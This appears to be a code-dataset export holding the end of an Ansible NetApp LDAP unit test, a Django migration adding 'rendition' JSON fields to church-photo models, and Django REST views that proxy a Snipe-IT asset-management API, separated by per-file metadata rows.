"names": ["test2.example.com"], "group_attributes": ["memberOf"], "user_attribute": "sAMAccountName"})
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
ldap = NetAppESeriesLdap()
with mock.patch(self.REQ_FUNC, return_value=(200, None)):
ldap.delete_domain("test2")
def test_delete_domain_fail(self):
"""Verify delete_domain returns expected data."""
self._set_args({"state": "present", "identifier": "test2", "server_url": "ldap://test2.example.com:389",
"search_base": "ou=accounts,DC=test,DC=example,DC=com",
"bind_user": "CN=cn,OU=accounts,DC=test2,DC=example,DC=com", "bind_password": "adminpass",
"role_mappings": {".*": ["storage.admin", "support.admin", "security.admin", "storage.monitor"]},
"names": ["test2.example.com"], "group_attributes": ["memberOf"], "user_attribute": "sAMAccountName"})
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
ldap = NetAppESeriesLdap()
with self.assertRaisesRegexp(AnsibleFailJson, "Failed to delete LDAP domain."):
with mock.patch(self.REQ_FUNC, return_value=Exception()):
ldap.delete_domain("test2")
def test_disable_domains_pass(self):
"""Verify disable_domains completes successfully."""
self._set_args({"state": "present", "identifier": "test2", "server_url": "ldap://test2.example.com:389",
"search_base": "ou=accounts,DC=test,DC=example,DC=com",
"bind_user": "CN=cn,OU=accounts,DC=test2,DC=example,DC=com", "bind_password": "adminpass",
"role_mappings": {".*": ["storage.admin", "support.admin", "security.admin", "storage.monitor"]},
"names": ["test2.example.com"], "group_attributes": ["memberOf"], "user_attribute": "sAMAccountName"})
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
ldap = NetAppESeriesLdap()
ldap.delete_domain = lambda x: None
ldap.existing_domain_ids = ["id1", "id2", "id3"]
ldap.disable_domains()
def test_apply_pass(self):
"""Verify apply exits as expected."""
self._set_args({"state": "present", "identifier": "test2", "server_url": "ldap://test2.example.com:389",
"search_base": "ou=accounts,DC=test,DC=example,DC=com",
"bind_user": "CN=cn,OU=accounts,DC=test2,DC=example,DC=com", "bind_password": "adminpass",
"role_mappings": {".*": ["storage.admin", "support.admin", "security.admin", "storage.monitor"]},
"names": ["test2.example.com"], "group_attributes": ["memberOf"], "user_attribute": "sAMAccountName"})
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
ldap = NetAppESeriesLdap()
ldap.build_request_body = lambda: None
ldap.are_changes_required = lambda: False
with self.assertRaisesRegexp(AnsibleExitJson, "No changes have been made to the LDAP configuration."):
ldap.apply()
self._set_args({"state": "present", "identifier": "test2", "server_url": "ldap://test2.example.com:389",
"search_base": "ou=accounts,DC=test,DC=example,DC=com",
"bind_user": "CN=cn,OU=accounts,DC=test2,DC=example,DC=com", "bind_password": "adminpass",
"role_mappings": {".*": ["storage.admin", "support.admin", "security.admin", "storage.monitor"]},
"names": ["test2.example.com"], "group_attributes": ["memberOf"], "user_attribute": "sAMAccountName"})
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
ldap = NetAppESeriesLdap()
ldap.build_request_body = lambda: None
ldap.are_changes_required = lambda: True
ldap.add_domain = lambda: None
ldap.domain = {}
with self.assertRaisesRegexp(AnsibleExitJson, "LDAP domain has been added."):
ldap.apply()
self._set_args({"state": "present", "identifier": "test2", "server_url": "ldap://test2.example.com:389",
"search_base": "ou=accounts,DC=test,DC=example,DC=com",
"bind_user": "CN=cn,OU=accounts,DC=test2,DC=example,DC=com", "bind_password": "adminpass",
"role_mappings": {".*": ["storage.admin", "support.admin", "security.admin", "storage.monitor"]},
"names": ["test2.example.com"], "group_attributes": ["memberOf"], "user_attribute": "sAMAccountName"})
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
ldap = NetAppESeriesLdap()
ldap.build_request_body = lambda: None
ldap.are_changes_required = lambda: True
ldap.update_domain = lambda: None
ldap.domain = {"id": "test"}
with self.assertRaisesRegexp(AnsibleExitJson, "LDAP domain has been updated."):
ldap.apply()
self._set_args({"state": "absent", "identifier": "test2"})
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
ldap = NetAppESeriesLdap()
ldap.build_request_body = lambda: None
ldap.are_changes_required = lambda: True
ldap.delete_domain = lambda x: None
ldap.domain = {"id": "test"}
with self.assertRaisesRegexp(AnsibleExitJson, "LDAP domain has been removed."):
ldap.apply()
self._set_args({"state": "disabled"})
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
ldap = NetAppESeriesLdap()
ldap.build_request_body = lambda: None
ldap.are_changes_required = lambda: True
ldap.disable_domain = lambda: None
ldap.domain = {"id": "test"}
with self.assertRaisesRegexp(AnsibleExitJson, "All LDAP domains have been removed."):
ldap.apply()
| 74.13172 | 155 | 0.576966 | 2,882 | 27,577 | 5.332408 | 0.069049 | 0.031234 | 0.035919 | 0.041905 | 0.894391 | 0.869274 | 0.834071 | 0.82893 | 0.807978 | 0.804984 | 0 | 0.032042 | 0.253073 | 27,577 | 371 | 156 | 74.331536 | 0.71405 | 0.026254 | 0 | 0.722045 | 0 | 0 | 0.381838 | 0.112991 | 0 | 0 | 0 | 0 | 0.063898 | 1 | 0.047923 | false | 0.115016 | 0.01278 | 0 | 0.076677 | 0.003195 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
3853888d969e420796f78833813e6ffe647f7a11 | 13,074 | py | Python | biserici_inlemnite/app/migrations/0100_auto_20211105_1127.py | ck-tm/biserici-inlemnite | c9d12127b92f25d3ab2fcc7b4c386419fe308a4e | [
"MIT"
] | null | null | null | biserici_inlemnite/app/migrations/0100_auto_20211105_1127.py | ck-tm/biserici-inlemnite | c9d12127b92f25d3ab2fcc7b4c386419fe308a4e | [
"MIT"
] | null | null | null | biserici_inlemnite/app/migrations/0100_auto_20211105_1127.py | ck-tm/biserici-inlemnite | c9d12127b92f25d3ab2fcc7b4c386419fe308a4e | [
"MIT"
] | null | null | null | # Generated by Django 3.1.13 on 2021-11-05 09:27
import django.contrib.postgres.fields.jsonb
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('app', '0099_auto_20211104_1734'),
]
operations = [
migrations.AddField(
model_name='pozeaccese',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozealtar',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozealteelementeimportante',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozeamplasament',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozebolti',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozeclopote',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozecor',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozecorpbiserica',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozecosoroabe',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozedescrierebolti',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozeelementearhitecturale',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozeelementesculptate',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozeetapeanterioareinvelitoare',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozeferestre',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozefinisajeexteriorcorp',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozefinisajeinchideretambur',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozefinisajeinvelitoare',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozefinisajeinvelitoareturle',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozefinisajeinvelitoareturn',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozefinisajexterior',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozefinisajperetiinteriori',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozefinisajtavanesibolti',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozefundatie',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozefundatii',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozegeneraleexterior',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozegeneraleinterior',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozeicoanevechi',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozeiconostas',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozeinstalatieelectrica',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozeinstalatietermica',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozeinvelitoaresarpantasiturn',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozemasaatlar',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozemobilier',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozemobiliere',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozeobiectedecult',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozeobiectedecultconservare',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozeobiecteinstrainate',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozeochiesi',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozeparatraznet',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozepardoseliinterioare',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozepeisagisticasitului',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozeperetedespartitor',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozepicturaexterioara',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozepicturainterioara',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozepisanie',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozeproscomidie',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozesarpanta',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozesarpantacorpbiserica',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozesit',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozesolee',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozestratpictural',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozestructuracatei',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozestructuracheotoare',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozestructuramixt',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozetalpi',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozetamplarii',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozeteren',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozetiranti',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozeturle',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozeturn',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozeturnconservare',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozevegetatie',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AddField(
model_name='pozezonadinjurulbiserici',
name='rendition',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
]
| 39.618182 | 88 | 0.59844 | 1,168 | 13,074 | 6.642123 | 0.086473 | 0.107244 | 0.173241 | 0.222738 | 0.837071 | 0.832947 | 0.832947 | 0.832947 | 0.832947 | 0.832947 | 0 | 0.003417 | 0.283693 | 13,074 | 329 | 89 | 39.738602 | 0.824987 | 0.003518 | 0 | 0.780186 | 1 | 0 | 0.129203 | 0.046446 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.009288 | 0 | 0.018576 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
38b0278ce0f5ee1c0172f8538212981841924478 | 21,533 | py | Python | api/tacticalrmm/integrations/snipeit/views.py | subzdev/tacticalrmm | 21d8899e9a01f0939ab908e82e1205fa7b632caf | [
"MIT"
] | 1 | 2021-12-29T07:20:57.000Z | 2021-12-29T07:20:57.000Z | api/tacticalrmm/integrations/snipeit/views.py | subzdev/tacticalrmm | 21d8899e9a01f0939ab908e82e1205fa7b632caf | [
"MIT"
] | null | null | null | api/tacticalrmm/integrations/snipeit/views.py | subzdev/tacticalrmm | 21d8899e9a01f0939ab908e82e1205fa7b632caf | [
"MIT"
] | 1 | 2021-12-29T05:55:53.000Z | 2021-12-29T05:55:53.000Z | from rest_framework.views import APIView
from rest_framework.permissions import AllowAny, IsAuthenticated
from rest_framework.response import Response
import requests
import json
from ..models import Integration
class GetHardware(APIView):
permission_classes = [IsAuthenticated]
def get(self, request, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.get(
integration.base_url + "hardware?limit=500&offset=0&order=desc&status=" + request.query_params["status"],
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
def post(self, request, format=None):
integration = Integration.objects.get(name="Snipe-IT")
payload = {
"requestable": False,
"asset_tag": request.data["asset_tag"],
"status_id": request.data["status_id"],
"model_id": request.data["model_id"],
"name": request.data["name"],
"serial": request.data["serial"],
"rtd_location_id": request.data["rtd_location_id"],
"company_id": request.data["company_id"],
"manufacturer_id": request.data["manufacturer_id"],
"supplier_id": request.data["supplier_id"],
"purchase_cost": request.data["purchase_cost"],
"purchase_date": request.data["purchase_date"],
"warranty_months": request.data["warranty_months"],
"order_number": request.data["order_number"]
}
result = requests.post(
integration.base_url + "hardware",
json=payload,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
class GetAsset(APIView):
permission_classes = [IsAuthenticated]
def get(self, request, asset_id, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.get(
integration.base_url + "hardware/" + asset_id,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
def put(self, request, asset_id, format=None):
integration = Integration.objects.get(name="Snipe-IT")
payload = {
"requestable": False,
"asset_tag": request.data["asset_tag"],
"status_id": request.data["status_id"],
"model_id": request.data["model_id"],
"name": request.data["name"],
"serial": request.data["serial"],
"rtd_location_id": request.data["rtd_location_id"],
"company_id": request.data["company_id"],
"manufacturer_id": request.data["manufacturer_id"],
"supplier_id": request.data["supplier_id"],
"purchase_cost": request.data["purchase_cost"],
"purchase_date": request.data["purchase_date"],
"warranty_months": request.data["warranty_months"],
"order_number": request.data["order_number"]
}
result = requests.put(
integration.base_url + "hardware/" + asset_id,
json=payload,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
def delete(self, request, asset_id, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.delete(
integration.base_url + "hardware/" + asset_id,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
class GetAssetByTag(APIView):
permission_classes = [IsAuthenticated]
def get(self, request, asset_tag, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.get(
integration.base_url + "hardware/bytag/" + asset_tag,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
class GetAssetCheckout(APIView):
permission_classes = [IsAuthenticated]
def post(self, request, asset_id, format=None):
integration = Integration.objects.get(name="Snipe-IT")
payload = {
"id": asset_id,
"checkout_to_type": request.data["checkout_to_type"],
"assigned_user": request.data["assigned_user"],
"checkout_at": request.data["checkout_at"],
"expected_checkin": request.data["expected_checkin"],
"note": request.data["note"]
}
result = requests.post(
integration.base_url + "hardware/" + asset_id + "/checkout",
json=payload,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
class GetAssetCheckin(APIView):
permission_classes = [IsAuthenticated]
def post(self, request, asset_id, format=None):
integration = Integration.objects.get(name="Snipe-IT")
payload = {
"id": asset_id,
"location_id": request.data["location_id"],
"note": request.data["note"]
}
result = requests.post(
integration.base_url + "hardware/" + asset_id + "/checkin",
json=payload,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
class GetCompanies(APIView):
permission_classes = [IsAuthenticated]
def get(self, request, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.get(
integration.base_url + "companies/",
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
class GetCompany(APIView):
permission_classes = [IsAuthenticated]
def get(self, request, company_id, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.get(
integration.base_url + "companies/" + company_id,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
def patch(self, request, company_id, format=None):
integration = Integration.objects.get(name="Snipe-IT")
payload = {
"name": request.data["name"]
}
result = requests.patch(
integration.base_url + "companies/" + company_id,
json=payload,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
def delete(self, request, company_id, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.delete(
integration.base_url + "companies/" + company_id,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
class GetStatusLabels(APIView):
permission_classes = [IsAuthenticated]
def get(self, request, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.get(
integration.base_url + "statuslabels/",
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
class GetCategories(APIView):
permission_classes = [IsAuthenticated]
def get(self, request, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.get(
integration.base_url + "categories/",
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
class GetModels(APIView):
permission_classes = [IsAuthenticated]
def get(self, request, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.get(
integration.base_url + "models/",
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
def post(self, request, format=None):
integration = Integration.objects.get(name="Snipe-IT")
payload = {
"name": request.data["model_name"],
"model_number": request.data["model_number"],
"category_id": request.data["category_id"],
"manufacturer_id": request.data["manufacturer_id"]
}
result = requests.post(
integration.base_url + "models",
json=payload,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
class GetModel(APIView):
permission_classes = [IsAuthenticated]
def get(self, request, model_id, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.get(
integration.base_url + "models/" + model_id,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
def put(self, request, model_id, format=None):
integration = Integration.objects.get(name="Snipe-IT")
payload = {
"name": request.data["name"],
"model_number": request.data["model_number"],
"category_id": request.data["category_id"],
"manufacturer_id": request.data["manufacturer_id"]
}
result = requests.put(
integration.base_url + "models/" + model_id,
json=payload,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
def delete(self, request, model_id, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.delete(
integration.base_url + "models/" + model_id,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
class GetManufacturers(APIView):
permission_classes = [IsAuthenticated]
def get(self, request, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.get(
integration.base_url + "manufacturers/",
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
class GetSuppliers(APIView):
permission_classes = [IsAuthenticated]
def get(self, request, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.get(
integration.base_url + "suppliers/",
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
class GetMaintenances(APIView):
permission_classes = [IsAuthenticated]
def get(self, request, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.get(
integration.base_url + "maintenances/",
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
def post(self, request, format=None):
integration = Integration.objects.get(name="Snipe-IT")
payload = {
"title": request.data["title"],
"asset_maintenance_type": request.data["asset_maintenance_type"],
"asset_id": request.data["asset_id"],
"supplier_id": request.data["supplier_id"],
"start_date": request.data["start_date"],
"completion_date": request.data["completion_date"],
"cost": request.data["cost"],
"notes": request.data["notes"]
}
result = requests.post(
integration.base_url + "maintenances",
json=payload,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
class GetMaintenance(APIView):
permission_classes = [IsAuthenticated]
def get(self, request, maintenance_id, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.get(
integration.base_url + "maintenances/" + maintenance_id,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
def patch(self, request, maintenance_id, format=None):
integration = Integration.objects.get(name="Snipe-IT")
payload = {
"title": request.data["title"],
"asset_maintenance_type": request.data["asset_maintenance_type"],
"asset_id": request.data["asset_id"],
"supplier_id": request.data["supplier_id"],
"start_date": request.data["start_date"],
"completion_date": request.data["completion_date"],
"cost": request.data["cost"],
"notes": request.data["notes"]
}
result = requests.patch(
integration.base_url + "maintenances/" + maintenance_id,
json=payload,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
def delete(self, request, maintenance_id, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.delete(
integration.base_url + "maintenances/" + maintenance_id,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
class GetLocations(APIView):
permission_classes = [IsAuthenticated]
def get(self, request, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.get(
integration.base_url + "locations/",
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
class GetLocation(APIView):
permission_classes = [IsAuthenticated]
def get(self, request, location_id, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.get(
integration.base_url + "locations/" + location_id,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
def patch(self, request, location_id, format=None):
integration = Integration.objects.get(name="Snipe-IT")
payload = {
"name": request.data["name"]
}
result = requests.patch(
integration.base_url + "locations/" + location_id,
json=payload,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
def delete(self, request, location_id, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.delete(
integration.base_url + "locations/" + location_id,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
class GetUsers(APIView):
permission_classes = [IsAuthenticated]
def get(self, request, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.get(
integration.base_url + "users/",
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
class GetUser(APIView):
permission_classes = [IsAuthenticated]
def get(self, request, user_id, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.get(
integration.base_url + "users/" + user_id,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
def patch(self, request, user_id, format=None):
integration = Integration.objects.get(name="Snipe-IT")
payload = {
"first_name": request.data["first_name"],
"last_name": request.data["last_name"],
"jobtitle": request.data["jobtitle"],
"department": request.data["department"]
}
result = requests.patch(
integration.base_url + "users/" + user_id,
json=payload,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
return Response(result)
def delete(self, request, user_id, format=None):
integration = Integration.objects.get(name="Snipe-IT")
result = requests.delete(
integration.base_url + "users/" + user_id,
headers={
"Accept": "application/json",
"Content-Type": "application/json",
"Authorization": f"Bearer {integration.api_key.strip()}"
},
).json()
